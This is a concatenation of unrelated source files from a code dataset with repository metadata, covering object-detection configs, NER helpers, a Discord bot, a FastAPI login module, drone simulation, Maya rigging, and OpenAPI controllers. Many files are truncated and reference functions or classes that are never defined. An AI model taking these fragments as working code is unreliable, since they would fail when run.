sirosen/git-fortune
|
69ef3e18506aa67fdc812854f1588828ea4e7448
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
tests/test_basics.py
|
sirosen/git-fortune
|
69ef3e18506aa67fdc812854f1588828ea4e7448
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
import subprocess
from git_fortune._compat import fix_line_endings
from git_fortune.version import __version__
def test_noargs(capfd):
"""just make sure it doesn't crashfail"""
subprocess.check_call(["git-fortune"])
captured = capfd.readouterr()
assert "GIT TIP #" in captured.out # from the box format
def test_category(capfd):
"""just make sure it doesn't crashfail"""
subprocess.check_call(["git-fortune", "--category", "diff"])
captured = capfd.readouterr()
assert "GIT TIP #" in captured.out # from the box format
| 33.386667 | 81 | 0.527157 |
6a167dd5d92960139223aa44954c2cb6cacf4375
| 2,487 |
py
|
Python
|
configs/keypoints/faster_rcnn_r50_fpn_keypoints.py
|
VGrondin/CBNetV2_mask_remote
|
b27246af5081d5395db3c3105d32226de05fcd13
|
[
"Apache-2.0"
] | null | null | null |
configs/keypoints/faster_rcnn_r50_fpn_keypoints.py
|
VGrondin/CBNetV2_mask_remote
|
b27246af5081d5395db3c3105d32226de05fcd13
|
[
"Apache-2.0"
] | null | null | null |
configs/keypoints/faster_rcnn_r50_fpn_keypoints.py
|
VGrondin/CBNetV2_mask_remote
|
b27246af5081d5395db3c3105d32226de05fcd13
|
[
"Apache-2.0"
] | null | null | null |
_base_ = [
'../_base_/models/faster_rcnn_r50_fpn.py'
]
model = dict(
type='FasterRCNN',
# pretrained='torchvision://resnet50',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=True),
norm_eval=True,
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
rpn_head=dict(
type='RPNHead',
in_channels=256,
feat_channels=256,
anchor_generator=dict(
type='AnchorGenerator',
scales=[8],
ratios=[0.5, 1.0, 2.0],
strides=[4, 8, 16, 32, 64]),
bbox_coder=dict(
type='DeltaXYWHBBoxCoder',
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0]),
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='L1Loss', loss_weight=1.0)),
roi_head=dict(
# type='StandardRoIHead',
_delete_=True,
type='KeypointRoIHead',
output_heatmaps=False,
# keypoint_head=dict(
# type='HRNetKeypointHead',
# num_convs=8,
# in_channels=256,
# features_size=[256, 256, 256, 256],
# conv_out_channels=512,
# num_keypoints=5,
# loss_keypoint=dict(type='MSELoss', loss_weight=50.0)),
keypoint_decoder=dict(type='HeatmapDecodeOneKeypoint', upscale=4),
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', output_size=7, sampling_ratio=0),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='Shared2FCBBoxHead',
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=80,
bbox_coder=dict(
type='DeltaXYWHBBoxCoder',
target_means=[0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2]),
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='L1Loss', loss_weight=1.0)))
)
#optimizer = dict(lr=0.002)
#lr_config = dict(step=[40, 55])
#total_epochs = 60
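# Typical usage sketch (assumes a standard MMDetection checkout; the command is
# illustrative and not part of this config):
#   python tools/train.py configs/keypoints/faster_rcnn_r50_fpn_keypoints.py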
| 32.298701 | 77 | 0.542421 |
6a168cae49b57ce434a41c7070da071ca4734fc0
| 3,232 |
py
|
Python
|
maskrcnn_benchmark/layers/roi_align_rotated_3d.py
|
picwoon/As_built_BIM
|
9e6b81e2fd8904f5afd013e21d2db45456c138d5
|
[
"MIT"
] | 2 |
2020-03-05T06:39:03.000Z
|
2020-03-31T12:08:04.000Z
|
maskrcnn_benchmark/layers/roi_align_rotated_3d.py
|
picwoon/As_built_BIM
|
9e6b81e2fd8904f5afd013e21d2db45456c138d5
|
[
"MIT"
] | null | null | null |
maskrcnn_benchmark/layers/roi_align_rotated_3d.py
|
picwoon/As_built_BIM
|
9e6b81e2fd8904f5afd013e21d2db45456c138d5
|
[
"MIT"
] | 1 |
2021-09-24T13:17:40.000Z
|
2021-09-24T13:17:40.000Z
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import torch, math
from torch import nn
from torch.autograd import Function
from torch.autograd.function import once_differentiable
from torch.nn.modules.utils import _pair
from SparseConvNet.sparseconvnet.tools_3d_2d import sparse_3d_to_dense_2d
import _C
roi_align_rotated_3d = _ROIAlignRotated3D.apply
| 34.021053 | 101 | 0.63552 |
6a16ef74b6b87e7acddaab1f4ea03a7e48da5422
| 8,360 |
py
|
Python
|
src/model/utils/utils.py
|
J-CITY/METADATA-EXTRACTOR
|
6bc01a7e4b74a3156c07efc2c80d5519c325dd53
|
[
"Apache-2.0"
] | null | null | null |
src/model/utils/utils.py
|
J-CITY/METADATA-EXTRACTOR
|
6bc01a7e4b74a3156c07efc2c80d5519c325dd53
|
[
"Apache-2.0"
] | null | null | null |
src/model/utils/utils.py
|
J-CITY/METADATA-EXTRACTOR
|
6bc01a7e4b74a3156c07efc2c80d5519c325dd53
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import os
from .logger import printLog
UNK = "$UNK$"
NUM = "$NUM$"
NONE = "O"
# Class that iterates over CoNLL Dataset
#Create a dictionary from dataset
def getDictionary(datasets):
printLog("Building dictionary: ")
dictWords = set()
dictTags = set()
for dataset in datasets:
for words, tags in dataset:
dictWords.update(words)
dictTags.update(tags)
printLog("DONE: " + str(len(dictWords)) + " size")
return dictWords, dictTags
def getCharDictionary(dataset):
dictChar = set()
for words, _ in dataset:
for word in words:
dictChar.update(word)
return dictChar
# filename - path to file with vectors
def getChunks(seq, tags):
"""Given a sequence of tags, group entities and their position
Args:
seq: [4, 4, 0, 0, ...] sequence of labels
tags: dict["O"] = 4
Returns:
list of (chunkType, chunkStart, chunkEnd)
Example:
seq = [4, 5, 0, 3]
tags = {"B-PER": 4, "I-PER": 5, "B-LOC": 3}
result = [("PER", 0, 2), ("LOC", 3, 4)]
"""
default = tags[NONE]
idxToTag = {idx: tag for tag, idx in tags.items()}
chunks = []
chunkType, chunkStart = None, None
for i, tok in enumerate(seq):
# End of a chunk 1
if tok == default and chunkType is not None:
# Add a chunk.
chunk = (chunkType, chunkStart, i)
chunks.append(chunk)
chunkType, chunkStart = None, None
# End of a chunk + start of a chunk!
elif tok != default:
tokChunkClass, tokChunkType = getChunkType(tok, idxToTag)
if chunkType is None:
chunkType, chunkStart = tokChunkType, i
elif tokChunkType != chunkType or tokChunkClass == "B":
chunk = (chunkType, chunkStart, i)
chunks.append(chunk)
chunkType, chunkStart = tokChunkType, i
else:
pass
# end condition
if chunkType is not None:
chunk = (chunkType, chunkStart, len(seq))
chunks.append(chunk)
return chunks
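# getChunkType is called above but elided in this snippet; a minimal sketch of the
# conventional IOB helper (an assumption, not necessarily the original code):
def getChunkType(tok, idxToTag):
    tagName = idxToTag[tok]            # e.g. 4 -> "B-PER"
    tagClass = tagName.split('-')[0]   # "B"
    tagType = tagName.split('-')[-1]   # "PER"
    return tagClass, tagType
# Example (mirrors the getChunks docstring):
#   getChunks([4, 5, 0, 3], {"B-PER": 4, "I-PER": 5, "B-LOC": 3, "O": 0})
#   -> [("PER", 0, 2), ("LOC", 3, 4)]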
| 32.784314 | 84 | 0.55323 |
6a1710262c6a5f82f36fe3fcc5a0ae77374c7e1e
| 148 |
py
|
Python
|
noxfile.py
|
fatcat2/biggestContributor
|
02f85fc072c460573af8eb6f0f6dcd3a9488af14
|
[
"MIT"
] | 2 |
2018-03-15T14:39:53.000Z
|
2018-03-15T20:34:14.000Z
|
noxfile.py
|
fatcat2/biggestContributor
|
02f85fc072c460573af8eb6f0f6dcd3a9488af14
|
[
"MIT"
] | 6 |
2018-03-16T15:43:27.000Z
|
2020-05-19T19:42:32.000Z
|
noxfile.py
|
fatcat2/biggestContributor
|
02f85fc072c460573af8eb6f0f6dcd3a9488af14
|
[
"MIT"
] | 3 |
2018-03-16T15:36:57.000Z
|
2020-05-19T19:34:47.000Z
|
import nox
FILE_PATHS = ["utils", "main.py"]
| 16.444444 | 37 | 0.675676 |
6a177f73dcbbd6c1d2721285cc1b7c72b4784fb1
| 2,781 |
py
|
Python
|
discordbot/economy/currencies.py
|
minhhoang1023/GamestonkTerminal
|
195dc19b491052df080178c0cc6a9d535a91a704
|
[
"MIT"
] | 1 |
2022-02-18T04:02:52.000Z
|
2022-02-18T04:02:52.000Z
|
discordbot/economy/currencies.py
|
minhhoang1023/GamestonkTerminal
|
195dc19b491052df080178c0cc6a9d535a91a704
|
[
"MIT"
] | null | null | null |
discordbot/economy/currencies.py
|
minhhoang1023/GamestonkTerminal
|
195dc19b491052df080178c0cc6a9d535a91a704
|
[
"MIT"
] | null | null | null |
import os
import df2img
import disnake
import pandas as pd
from PIL import Image
import discordbot.config_discordbot as cfg
from discordbot.config_discordbot import logger
from discordbot.helpers import autocrop_image
from gamestonk_terminal.economy import wsj_model
| 27.81 | 85 | 0.54297 |
6a17d1c656acfd1f8102ff27381a0764e4f0a027
| 3,276 |
py
|
Python
|
aiovectortiler/config_handler.py
|
shongololo/aiovectortiler
|
cfd0008d5ac05baee52a24264f991946324f5a42
|
[
"MIT"
] | 4 |
2016-07-24T20:39:40.000Z
|
2018-12-26T06:43:35.000Z
|
aiovectortiler/config_handler.py
|
songololo/aiovectortiler
|
cfd0008d5ac05baee52a24264f991946324f5a42
|
[
"MIT"
] | 7 |
2016-08-10T16:27:39.000Z
|
2018-10-13T13:16:24.000Z
|
aiovectortiler/config_handler.py
|
songololo/aiovectortiler
|
cfd0008d5ac05baee52a24264f991946324f5a42
|
[
"MIT"
] | 3 |
2016-08-09T03:12:24.000Z
|
2016-11-08T01:17:29.000Z
|
import os
import yaml
import logging
logger = logging.getLogger(__name__)
# the following model structures for recipes / layers / queries allow searching up the chain
# for attributes. If an attribute is not found at the root recipes level, the server configs are checked.
| 28.99115 | 124 | 0.626984 |
6a17dd33b700261e4940d552334d981b6c74eaed
| 128 |
py
|
Python
|
volksdep/converters/__init__.py
|
repoww/volksdep
|
ceaccd30a29a3ba82bd4f9be0c52b8c99c8d6290
|
[
"Apache-2.0"
] | 271 |
2020-05-22T11:05:19.000Z
|
2022-02-27T13:57:38.000Z
|
volksdep/converters/__init__.py
|
repoww/volksdep
|
ceaccd30a29a3ba82bd4f9be0c52b8c99c8d6290
|
[
"Apache-2.0"
] | 16 |
2020-06-28T09:54:07.000Z
|
2022-01-18T09:08:07.000Z
|
volksdep/converters/__init__.py
|
repoww/volksdep
|
ceaccd30a29a3ba82bd4f9be0c52b8c99c8d6290
|
[
"Apache-2.0"
] | 34 |
2020-05-22T11:08:29.000Z
|
2021-12-18T22:47:06.000Z
|
from .torch2onnx import torch2onnx
from .onnx2trt import onnx2trt
from .torch2trt import torch2trt
from .base import load, save
| 25.6 | 34 | 0.828125 |
6a17e7c4a91ac2e9483c7bdc29806cbac3d7a40c
| 13,237 |
py
|
Python
|
t2vretrieval/models/mlmatch.py
|
Roc-Ng/HANet
|
e679703e9e725205424d87f750358fb4f62ceec5
|
[
"MIT"
] | 34 |
2021-07-26T12:22:05.000Z
|
2022-03-08T03:49:33.000Z
|
t2vretrieval/models/mlmatch.py
|
hexiangteng/HANet
|
31d37ccad9c56ff9422cb4eb9d32e79e7b9bc831
|
[
"MIT"
] | null | null | null |
t2vretrieval/models/mlmatch.py
|
hexiangteng/HANet
|
31d37ccad9c56ff9422cb4eb9d32e79e7b9bc831
|
[
"MIT"
] | 3 |
2021-08-03T06:00:26.000Z
|
2021-12-27T03:26:12.000Z
|
import numpy as np
import torch
import framework.ops
import t2vretrieval.encoders.mlsent
import t2vretrieval.encoders.mlvideo
import t2vretrieval.models.globalmatch
from t2vretrieval.models.criterion import cosine_sim
from t2vretrieval.models.globalmatch import VISENC, TXTENC
| 46.939716 | 156 | 0.694568 |
6a186a13afeea2c9ca39fb78982684eb10c871db
| 3,784 |
py
|
Python
|
bench_fastapi/authentication/controllers/login.py
|
sharkguto/teste_carga
|
56d6e9dcbd3e7b7fe7295d8fcf4b4e8b84943cfb
|
[
"MIT"
] | 1 |
2021-10-14T07:27:47.000Z
|
2021-10-14T07:27:47.000Z
|
bench_fastapi/authentication/controllers/login.py
|
sharkguto/teste_carga
|
56d6e9dcbd3e7b7fe7295d8fcf4b4e8b84943cfb
|
[
"MIT"
] | 4 |
2019-08-06T02:26:32.000Z
|
2021-06-10T21:39:19.000Z
|
bench_fastapi/authentication/controllers/login.py
|
sharkguto/teste_carga
|
56d6e9dcbd3e7b7fe7295d8fcf4b4e8b84943cfb
|
[
"MIT"
] | 1 |
2018-05-11T18:04:41.000Z
|
2018-05-11T18:04:41.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# login.py
# @Author : Gustavo Freitas ([email protected])
# @Link :
# @Date : 12/12/2019, 11:43:07 AM
from typing import Optional, Any
from fastapi import APIRouter, Body, Depends, HTTPException
from fastapi import Header, Security
from authentication.models.users import User
from fastapi.security import HTTPBasic, HTTPBasicCredentials, APIKeyHeader
from typing import List
from starlette.responses import Response
from fastapi.encoders import jsonable_encoder
from authentication.interfaces.database import database
import jwt
from starlette.status import HTTP_400_BAD_REQUEST, HTTP_401_UNAUTHORIZED
from datetime import datetime, timedelta
from hashlib import sha256
from authentication.interfaces.token import verify_token
router = APIRouter()
security = HTTPBasic(auto_error=True)
api_key = APIKeyHeader(name="x-api-key", auto_error=True)
# @router.post("/login", dependencies=[Depends(verify_token)])
# async def renew_token(x_api_key: str = Header(None)):
# return {"ok": x_api_key}
| 29.795276 | 83 | 0.681818 |
6a190e5eb1440e6a01fc6f170da74507f39571ac
| 6,295 |
py
|
Python
|
dronesym-python/flask-api/src/dronepool.py
|
dilinade/DroneSym
|
30073bd31343bc27c6b8d72e48b4e06ced0c5fe6
|
[
"Apache-2.0"
] | 1 |
2019-03-24T23:50:07.000Z
|
2019-03-24T23:50:07.000Z
|
dronesym-python/flask-api/src/dronepool.py
|
dilinade/DroneSym
|
30073bd31343bc27c6b8d72e48b4e06ced0c5fe6
|
[
"Apache-2.0"
] | null | null | null |
dronesym-python/flask-api/src/dronepool.py
|
dilinade/DroneSym
|
30073bd31343bc27c6b8d72e48b4e06ced0c5fe6
|
[
"Apache-2.0"
] | null | null | null |
# DronePool module which handles interaction with SITLs
from dronekit import Vehicle, VehicleMode, connect
from dronekit_sitl import SITL
from threading import Lock
import node, time
import mavparser
import threadrunner
drone_pool = {}
instance_count = 0
env_test = False
q = None
mq = None
lock = Lock()
| 27.133621 | 187 | 0.707705 |
6a19dea1f3bc079f6c50613369f0699df82e34cf
| 2,365 |
py
|
Python
|
Problemset/longest-string-chain/longest-string-chain.py
|
KivenCkl/LeetCode
|
fcc97c66f8154a5d20c2aca86120cb37b9d2d83d
|
[
"MIT"
] | 7 |
2019-05-08T03:41:05.000Z
|
2020-12-22T12:39:43.000Z
|
Problemset/longest-string-chain/longest-string-chain.py
|
Yuziquan/LeetCode
|
303fc1c8af847f783c4020bd731b28b72ed92a35
|
[
"MIT"
] | 1 |
2021-07-19T03:48:35.000Z
|
2021-07-19T03:48:35.000Z
|
Problemset/longest-string-chain/longest-string-chain.py
|
Yuziquan/LeetCode
|
303fc1c8af847f783c4020bd731b28b72ed92a35
|
[
"MIT"
] | 7 |
2019-05-10T20:43:20.000Z
|
2021-02-22T03:47:35.000Z
|
# @Title: (Longest String Chain)
# @Author: KivenC
# @Date: 2019-05-26 20:35:25
# @Runtime: 144 ms
# @Memory: 13.3 MB
| 33.785714 | 81 | 0.442283 |
6a19e8bf83375a817e65cca3fb4f7daafac8434e
| 21,107 |
py
|
Python
|
IKFK Builder/IKFK_Builder.py
|
ssimbox/ssimbox-rigTools
|
824bc3b90c42ab54d01b4b0007f00e7cc2f2f08c
|
[
"MIT"
] | 1 |
2021-01-19T13:36:42.000Z
|
2021-01-19T13:36:42.000Z
|
IKFK Builder/IKFK_Builder.py
|
ssimbox/sbx-autorig
|
824bc3b90c42ab54d01b4b0007f00e7cc2f2f08c
|
[
"MIT"
] | 2 |
2021-03-29T22:15:08.000Z
|
2021-03-29T22:17:37.000Z
|
IKFK Builder/IKFK_Builder.py
|
ssimbox/ssimbox-rigTools
|
824bc3b90c42ab54d01b4b0007f00e7cc2f2f08c
|
[
"MIT"
] | null | null | null |
from ctrlUI_lib import createClav2, createSphere
import maya.cmds as cmds
import maya.OpenMaya as om
from functools import partial
# Buttons +1 and +3
count = 0
showUI()
| 41.386275 | 140 | 0.607713 |
6a1cf3b76d95e590eb1efa6bc9673c121f9d7242
| 5,128 |
py
|
Python
|
pipng/imagescale-q-m.py
|
nwiizo/joke
|
808c4c998cc7f5b7f6f3fb5a3ce421588a70c087
|
[
"MIT"
] | 1 |
2017-01-11T06:12:24.000Z
|
2017-01-11T06:12:24.000Z
|
pipng/imagescale-q-m.py
|
ShuyaMotouchi/joke
|
808c4c998cc7f5b7f6f3fb5a3ce421588a70c087
|
[
"MIT"
] | null | null | null |
pipng/imagescale-q-m.py
|
ShuyaMotouchi/joke
|
808c4c998cc7f5b7f6f3fb5a3ce421588a70c087
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright 2012-13 Qtrac Ltd. All rights reserved.
# This program or module is free software: you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version. It is provided for
# educational purposes and is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
import argparse
import collections
import math
import multiprocessing
import os
import sys
import Image
import Qtrac
Result = collections.namedtuple("Result", "copied scaled name")
Summary = collections.namedtuple("Summary", "todo copied scaled canceled")
if __name__ == "__main__":
main()
| 36.892086 | 76 | 0.63475 |
6a1f0af3de00ce3a7fdb8765f1bbb9115dd67f60
| 35,122 |
py
|
Python
|
test/integration_test.py
|
NoopDog/azul
|
37614eff627888065c7b0a277b3137b8a587ed51
|
[
"Apache-2.0"
] | null | null | null |
test/integration_test.py
|
NoopDog/azul
|
37614eff627888065c7b0a277b3137b8a587ed51
|
[
"Apache-2.0"
] | null | null | null |
test/integration_test.py
|
NoopDog/azul
|
37614eff627888065c7b0a277b3137b8a587ed51
|
[
"Apache-2.0"
] | null | null | null |
from abc import (
ABCMeta,
)
from concurrent.futures.thread import (
ThreadPoolExecutor,
)
from contextlib import (
contextmanager,
)
import csv
from functools import (
lru_cache,
)
import gzip
from io import (
BytesIO,
TextIOWrapper,
)
import json
import logging
import os
import random
import re
import sys
import threading
import time
from typing import (
AbstractSet,
Any,
Dict,
IO,
List,
Mapping,
Optional,
Sequence,
Tuple,
cast,
)
import unittest
from unittest import (
mock,
)
import uuid
from zipfile import (
ZipFile,
)
import attr
import chalice.cli
from furl import (
furl,
)
from google.cloud import (
storage,
)
from google.oauth2 import (
service_account,
)
from hca.dss import (
DSSClient,
)
from hca.util import (
SwaggerAPIException,
)
from humancellatlas.data.metadata.helpers.dss import (
download_bundle_metadata,
)
from more_itertools import (
first,
one,
)
from openapi_spec_validator import (
validate_spec,
)
import requests
from azul import (
CatalogName,
cached_property,
config,
drs,
)
from azul.azulclient import (
AzulClient,
AzulClientNotificationError,
)
from azul.drs import (
AccessMethod,
)
import azul.dss
from azul.es import (
ESClientFactory,
)
from azul.indexer import (
BundleFQID,
)
from azul.indexer.index_service import (
IndexService,
)
from azul.logging import (
configure_test_logging,
)
from azul.modules import (
load_app_module,
)
from azul.portal_service import (
PortalService,
)
from azul.requests import (
requests_session_with_retry_after,
)
from azul.types import (
JSON,
)
from azul_test_case import (
AlwaysTearDownTestCase,
AzulTestCase,
)
log = logging.getLogger(__name__)
# noinspection PyPep8Naming
catalog = first(config.integration_test_catalogs.keys())
| 40.231386 | 117 | 0.553442 |
6a1f1b69ee306e65ab06cc8411c8b814a7455225
| 4,886 |
py
|
Python
|
server/openapi_server/controllers/data_transformation_controller.py
|
mintproject/MINT-ModelCatalogIngestionAPI
|
026d3495483a3e48ea3c1364d0dda09beeea69e4
|
[
"Apache-2.0"
] | 2 |
2019-05-30T21:33:43.000Z
|
2019-09-27T21:04:38.000Z
|
server/openapi_server/controllers/data_transformation_controller.py
|
mintproject/model-catalog-api
|
2ad7016691891497bba37afe8ceb0fea8fe769e5
|
[
"Apache-2.0"
] | 82 |
2019-10-08T16:35:34.000Z
|
2022-03-15T18:25:27.000Z
|
server/openapi_server/controllers/data_transformation_controller.py
|
mintproject/model-catalog-api
|
2ad7016691891497bba37afe8ceb0fea8fe769e5
|
[
"Apache-2.0"
] | null | null | null |
import connexion
import six
from openapi_server import query_manager
from openapi_server.utils.vars import DATATRANSFORMATION_TYPE_NAME, DATATRANSFORMATION_TYPE_URI
from openapi_server.models.data_transformation import DataTransformation # noqa: E501
from openapi_server import util
def custom_datasetspecifications_id_datatransformations_get(id, custom_query_name=None, username=None): # noqa: E501
"""Gets a list of data transformations related a dataset
Gets a list of data transformations related a dataset # noqa: E501
:param id: The ID of the dataspecification
:type id: str
:param custom_query_name: Name of the custom query
:type custom_query_name: str
:param username: Username to query
:type username: str
:rtype: List[DataTransformation]
"""
return query_manager.get_resource(id=id,
custom_query_name=custom_query_name,
username=username,
rdf_type_uri=DATATRANSFORMATION_TYPE_URI,
rdf_type_name=DATATRANSFORMATION_TYPE_NAME,
kls=DataTransformation)
def datatransformations_get(username=None, label=None, page=None, per_page=None): # noqa: E501
"""List all instances of DataTransformation
Gets a list of all instances of DataTransformation (more information in https://w3id.org/okn/o/sd#DataTransformation) # noqa: E501
:param username: Name of the user graph to query
:type username: str
:param label: Filter by label
:type label: str
:param page: Page number
:type page: int
:param per_page: Items per page
:type per_page: int
:rtype: List[DataTransformation]
"""
return query_manager.get_resource(
username=username,
label=label,
page=page,
per_page=per_page,
rdf_type_uri=DATATRANSFORMATION_TYPE_URI,
rdf_type_name=DATATRANSFORMATION_TYPE_NAME,
kls=DataTransformation)
def datatransformations_id_delete(id, user=None): # noqa: E501
"""Delete an existing DataTransformation
Delete an existing DataTransformation (more information in https://w3id.org/okn/o/sd#DataTransformation) # noqa: E501
:param id: The ID of the DataTransformation to be retrieved
:type id: str
:param user: Username
:type user: str
:rtype: None
"""
return query_manager.delete_resource(id=id,
user=user,
rdf_type_uri=DATATRANSFORMATION_TYPE_URI,
rdf_type_name=DATATRANSFORMATION_TYPE_NAME,
kls=DataTransformation)
def datatransformations_id_get(id, username=None): # noqa: E501
"""Get a single DataTransformation by its id
Gets the details of a given DataTransformation (more information in https://w3id.org/okn/o/sd#DataTransformation) # noqa: E501
:param id: The ID of the DataTransformation to be retrieved
:type id: str
:param username: Name of the user graph to query
:type username: str
:rtype: DataTransformation
"""
return query_manager.get_resource(id=id,
username=username,
rdf_type_uri=DATATRANSFORMATION_TYPE_URI,
rdf_type_name=DATATRANSFORMATION_TYPE_NAME,
kls=DataTransformation)
def datatransformations_id_put(id, user=None, data_transformation=None): # noqa: E501
"""Update an existing DataTransformation
Updates an existing DataTransformation (more information in https://w3id.org/okn/o/sd#DataTransformation) # noqa: E501
:param id: The ID of the DataTransformation to be retrieved
:type id: str
:param user: Username
:type user: str
    :param data_transformation: An old DataTransformation to be updated
:type data_transformation: dict | bytes
:rtype: DataTransformation
"""
if connexion.request.is_json:
data_transformation = DataTransformation.from_dict(connexion.request.get_json()) # noqa: E501
return query_manager.put_resource(id=id,
user=user,
body=data_transformation,
rdf_type_uri=DATATRANSFORMATION_TYPE_URI,
rdf_type_name=DATATRANSFORMATION_TYPE_NAME,
kls=DataTransformation)
def datatransformations_post(user=None, data_transformation=None): # noqa: E501
"""Create one DataTransformation
Create a new instance of DataTransformation (more information in https://w3id.org/okn/o/sd#DataTransformation) # noqa: E501
:param user: Username
:type user: str
    :param data_transformation: Information about the DataTransformation to be created
:type data_transformation: dict | bytes
:rtype: DataTransformation
"""
if connexion.request.is_json:
data_transformation = DataTransformation.from_dict(connexion.request.get_json()) # noqa: E501
return query_manager.post_resource(
user=user,
body=data_transformation,
rdf_type_uri=DATATRANSFORMATION_TYPE_URI,
rdf_type_name=DATATRANSFORMATION_TYPE_NAME,
kls=DataTransformation)
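# Illustrative client-side call (the endpoint path is inferred from the controller
# naming convention and has not been checked against the OpenAPI spec):
#   import requests
#   resp = requests.get("https://<api-host>/datatransformations",
#                       params={"username": "alice", "page": 1, "per_page": 50})
#   transformations = resp.json()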
| 33.465753 | 134 | 0.731068 |
6a1f4e62deeca6901732e02e6f44f1571b8f71c9
| 2,634 |
py
|
Python
|
shap/plots/monitoring.py
|
NunoEdgarGFlowHub/shap
|
6992883fb3470163fcbe2bfacae0bd5f724ed1f8
|
[
"MIT"
] | 8 |
2019-09-23T16:20:40.000Z
|
2021-10-09T20:26:20.000Z
|
shap/plots/monitoring.py
|
NunoEdgarGFlowHub/shap
|
6992883fb3470163fcbe2bfacae0bd5f724ed1f8
|
[
"MIT"
] | 1 |
2019-02-22T10:16:13.000Z
|
2019-02-22T10:16:13.000Z
|
shap/plots/monitoring.py
|
NunoEdgarGFlowHub/shap
|
6992883fb3470163fcbe2bfacae0bd5f724ed1f8
|
[
"MIT"
] | 4 |
2019-06-28T12:50:51.000Z
|
2021-07-02T07:42:18.000Z
|
import numpy as np
import scipy
import warnings
try:
import matplotlib.pyplot as pl
import matplotlib
except ImportError:
warnings.warn("matplotlib could not be loaded!")
pass
from . import labels
from . import colors
def monitoring_plot(ind, shap_values, features, feature_names=None):
""" Create a SHAP monitoring plot.
(Note this function is preliminary and subject to change!!)
A SHAP monitoring plot is meant to display the behavior of a model
over time. Often the shap_values given to this plot explain the loss
of a model, so changes in a feature's impact on the model's loss over
time can help in monitoring the model's performance.
Parameters
----------
ind : int
Index of the feature to plot.
shap_values : numpy.array
Matrix of SHAP values (# samples x # features)
features : numpy.array or pandas.DataFrame
Matrix of feature values (# samples x # features)
feature_names : list
Names of the features (length # features)
"""
if str(type(features)).endswith("'pandas.core.frame.DataFrame'>"):
if feature_names is None:
feature_names = features.columns
features = features.values
pl.figure(figsize=(10,3))
ys = shap_values[:,ind]
xs = np.arange(len(ys))#np.linspace(0, 12*2, len(ys))
pvals = []
inc = 50
for i in range(inc, len(ys)-inc, inc):
#stat, pval = scipy.stats.mannwhitneyu(v[:i], v[i:], alternative="two-sided")
stat, pval = scipy.stats.ttest_ind(ys[:i], ys[i:])
pvals.append(pval)
min_pval = np.min(pvals)
min_pval_ind = np.argmin(pvals)*inc + inc
if min_pval < 0.05 / shap_values.shape[1]:
pl.axvline(min_pval_ind, linestyle="dashed", color="#666666", alpha=0.2)
pl.scatter(xs, ys, s=10, c=features[:,ind], cmap=colors.red_blue)
pl.xlabel("Sample index")
pl.ylabel(truncate_text(feature_names[ind], 30) + "\nSHAP value", size=13)
pl.gca().xaxis.set_ticks_position('bottom')
pl.gca().yaxis.set_ticks_position('left')
pl.gca().spines['right'].set_visible(False)
pl.gca().spines['top'].set_visible(False)
cb = pl.colorbar()
cb.outline.set_visible(False)
bbox = cb.ax.get_window_extent().transformed(pl.gcf().dpi_scale_trans.inverted())
cb.ax.set_aspect((bbox.height - 0.7) * 20)
cb.set_label(truncate_text(feature_names[ind], 30), size=13)
pl.show()
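# truncate_text is referenced above but not defined in this snippet; a minimal
# sketch of a compatible helper (an assumption, not the shap original):
def truncate_text(text, max_len):
    if len(text) > max_len:
        return text[:max_len - 3] + "..."
    return text
# Illustrative usage with synthetic data (hypothetical, for demonstration only):
#   import pandas as pd
#   rng = np.random.RandomState(0)
#   X = pd.DataFrame(rng.randn(500, 3), columns=["f0", "f1", "f2"])
#   sv = rng.randn(500, 3) * 0.1
#   sv[250:, 0] += 0.5  # inject a shift so the t-test flags it
#   monitoring_plot(0, sv, X)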
| 33.769231 | 85 | 0.648823 |
6a1f7efcf406b9bcc9bc35cc271b47eed9db309f
| 7,998 |
py
|
Python
|
mod_core.py
|
nokia-wroclaw/innovativeproject-dbshepherd
|
f82f3b36caaf9fcd6d28076051cb92458ba2edd3
|
[
"MIT"
] | null | null | null |
mod_core.py
|
nokia-wroclaw/innovativeproject-dbshepherd
|
f82f3b36caaf9fcd6d28076051cb92458ba2edd3
|
[
"MIT"
] | null | null | null |
mod_core.py
|
nokia-wroclaw/innovativeproject-dbshepherd
|
f82f3b36caaf9fcd6d28076051cb92458ba2edd3
|
[
"MIT"
] | 1 |
2020-02-05T20:02:15.000Z
|
2020-02-05T20:02:15.000Z
|
import re
import os
import cmd
import sys
import common
from getpass import getpass
from kp import KeePassError, get_password
from configmanager import ConfigManager, ConfigManagerError
common.init()
| 29.512915 | 132 | 0.635159 |
6a2025301420406c02ae8d4c4fc4c88641b66f90
| 7,702 |
py
|
Python
|
code/testbed/pde1/FemPde1.py
|
nicolai-schwartze/Masterthesis
|
7857af20c6b233901ab3cedc325bd64704111e16
|
[
"MIT"
] | 1 |
2020-06-13T10:02:02.000Z
|
2020-06-13T10:02:02.000Z
|
code/testbed/pde1/FemPde1.py
|
nicolai-schwartze/Masterthesis
|
7857af20c6b233901ab3cedc325bd64704111e16
|
[
"MIT"
] | null | null | null |
code/testbed/pde1/FemPde1.py
|
nicolai-schwartze/Masterthesis
|
7857af20c6b233901ab3cedc325bd64704111e16
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
